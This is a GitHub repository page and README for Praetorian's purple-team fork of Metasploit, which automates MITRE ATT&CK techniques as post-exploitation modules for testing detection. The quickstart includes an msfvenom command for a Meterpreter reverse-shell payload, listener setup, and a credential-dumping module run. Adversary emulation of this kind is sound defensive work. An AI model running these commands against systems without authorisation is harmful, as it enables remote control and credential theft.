Skip to content
Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
Branch: master
Clone or download
Latest commit a94608b May 2, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.github update PR template to ask for unique branch Jan 5, 2019
app Move shared example from pro into framework Apr 7, 2016
config just print the error, but don't give specific advice Mar 15, 2019
data Updated gemspec file with gmail dependencies May 2, 2019
db automatic module_metadata_base.json update Apr 8, 2019
docker fixes #3 May 2, 2019
documentation
external Cisco RV32x RCE added reference IDs, some beautifications. Feb 25, 2019
lib Initial commit with Praetorian contributions Apr 9, 2019
modules Updated gemspec file with gmail dependencies May 2, 2019
plugins Land #11603, Fail nicely when load aggregator. Mar 26, 2019
script kill cucumber in framework Jul 12, 2017
scripts Initial commit with Praetorian contributions Apr 9, 2019
spec add missing payload specs Apr 1, 2019
test delete test, seems the sanity mechanism isn't ready for aux modules Feb 25, 2019
tools fix Failure scoping (needed for libraries) Apr 8, 2019
.dockerignore change docker root exec Oct 21, 2018
.gitignore Land #9220, Module cache improvements Jan 18, 2018
.gitmodules Add RDI submodule, port Kitrap0d Nov 27, 2013
.mailmap revisionism Jan 11, 2019
.rspec Add modern --require to .rspec Oct 8, 2014
.rubocop.yml remove Ruby 2.2 constraint Mar 11, 2019
.ruby-gemset Restoring ruby and gemset files May 20, 2014
.ruby-version ruby 2.6.2 Mar 16, 2019
.simplecov Remove fastlib Sep 18, 2014
.travis.yml update ruby 2.5.5 too Mar 21, 2019
.yardopts remove HACKING from yardopts Sep 7, 2017
CODE_OF_CONDUCT.md Change individual contacts Dec 13, 2018
CONTRIBUTING.md Update CONTRIBUTING.md May 2, 2019
COPYING Update COPYING Jan 9, 2018
CURRENT.md add CURRENT.md to track major changes and how to migrate with them Jan 18, 2018
Dockerfile
Execute-Assembly.md Initial commit with Praetorian contributions Apr 9, 2019
Gemfile Bump to released metasm 1.0.4 Apr 8, 2019
Gemfile.local.example update Gemfile.local example, use Gemfile.local if it exists when bun… Apr 30, 2017
Gemfile.lock Bump to released metasm 1.0.4 Apr 8, 2019
LICENSE Cisco RV32x RCE added reference IDs, some beautifications. Feb 25, 2019
LICENSE_GEMS
README.md Update README.md May 2, 2019
Rakefile trying rspec-retry Jun 20, 2017
Vagrantfile neither Dockerfile nor Vagrant should actually install bundler these … Mar 15, 2019
docker-compose.override.yml change docker root exec Oct 21, 2018
docker-compose.yml change docker root exec Oct 21, 2018
metasploit-framework.gemspec Updated gemspec file with gmail dependencies May 2, 2019
msf-json-rpc.ru Move under Msf::WebServices namespace Nov 26, 2018
msf-ws.ru Add Metasploit data web service rackup file Jan 15, 2019
msfconsole Improved CTRL-C edge case, Invalid Options edge case, help output, ve… Mar 20, 2018
msfd Removing unnecessary spaces Sep 12, 2017
msfdb Don't delete ssl key and cert if a user asked not to Mar 5, 2019
msfrpc Removing unnecessary spaces Sep 12, 2017
msfrpcd Add background process ID output Jan 9, 2019
msfupdate remove "require 'os'", not needed or available May 14, 2018
msfvenom Cisco RV32x RCE added reference IDs, some beautifications. Feb 25, 2019

README.md

Purple Team ATT&CK™ Automation

At Praetorian, we were seeking a way to automatically emulate adversary tactics in order to evaluate detection and response capabilities. Our solution implements MITRE ATT&CK™ TTPs as Metasploit Framework post modules. As of this release, we've automated a little over 100 TTPs as modules.

Metasploit's advantage is its robust library, capability to interact with operating system APIs, and its flexible license. In addition, we're able to emulate the features of other tools such as in-memory .NET execution via leveraging Metasploit's execute_powershell functionality. This allows Blue Teams to ensure that their tools are alerting on the actual TTP behavior and not execution artifacts (such as encoded PowerShell).

Our solution is built on top of the latest version of Metasploit as of 09Apr2019 (pulled from: https://github.com/rapid7/metasploit-framework). We’ve made minor modifications to Metasploit’s code base to enable some of the automation. Everything should work as intended if you’re already familiar with Metasploit. The magic happens after you establish a Meterpreter session and run a TTP as a post-exploitation module.

We're open sourcing our work because we believe in solving the cybersecurity problem. By giving Blue Teams more tools to emulate adversary behavior, we hope to improve their capabilities and reduce the still very high average dwell time.

Wiki

For detailed opertional usage guidance and a full list of modules and changes, please view the GitHub Wiki.

Quickstart

Quick start video guide

Quick start video guide: https://youtu.be/o3Qb_0clIpg

Installation should follow the instructions for installing a Metasploit Docker environment: https://github.com/rapid7/metasploit-framework/tree/master/docker

In general:

  • Install Docker
  • git clone https://github.com/praetorian-code/purple-team-attack-automation.git
  • Edit ./docker-compose.local.override.yml to reflect the LHOST of your local system similar to below. By default, port 4444 will be forwarded to the docker container. If you want to use other ports, for instance to mirror HTTPS, you'll have to add them to this file.
version: '3'
services:
  ms:
    environment:
      # example of setting LHOST
      LHOST: 10.0.8.2
    # example of adding more ports
    ports:
      - 8080:8080
      - 443:443
  • Add / Remove further ports or IP addresses as you see fit. Don't forget to change the LHOST to your own IP address.
  • Make sure you set LHOST to valid hostname that resolves to your host machine.
  • Now you need to set the COMPOSE_FILE environment variable to load your local override.
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
  • docker-compose build
  • Start the container with ./docker/bin/msfconsole
  • Generate a Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Attacker IP Address> LPORT=4444 -f exe > meterpreter.exe
  • Start and run a local listener:
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST <Attacker IP Address>
 set LPORT 4444
 exploit -j -z

Copy and run meterpreter.exe on the target (“victim”) host as admin and wait for a session.

  • Run a TTP as a post-exploitation module. The list of modules is provided below. For example, to start the 'Credential Dumping (T1003)’ module, run:
use modules/post/windows/purple/t1003
info
set session 1
run

Meterpreter Payloads

Praetorian recommends you utilize the nightly installers in order to run msfvenom to create your payloads.

Common Errors

ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

Solved by

service docker start

Future Work

  • Integrate the container into a fork of DetectionLab
  • Compare execution of CALDERA and MSF and how artifacts differ so we can improve adversary emulation
  • Leverage the MSFRPCD to facilitate automatic attack chaining

Contact

If you're interested in our Purple Team services, please contact us online or read more about "Why Praetorian Benchmarks to MITRE ATT&CK™ and Why You Should Too".

If you're an engineer looking to join our great team, we have openings at our careers page.

Contributing

See the Contribution Guide for a step-by-step guide to making a module.

Also, follow the Metasploit Framework's general contributing guidelines.

Acknowledgements

We'd like to thank various members of the security community for providing a lot of the techniques and code that we integrated into this project.

At Praetorian, the following engineers helped contribute modules:

  • Josh Abraham jabra [at] spl0it.org and @jabra
  • Abraham Adberstein
  • Tanner Harper
  • Thomas Hendrickson github.com/tomis007
  • George Jouldjian
  • Dallas Kaman
  • Blake Luther
  • Matt Schneider
  • Matthew Verrette
  • Daniel Wyleczuk-Stern @daniel_infosec
You can’t perform that action at this time.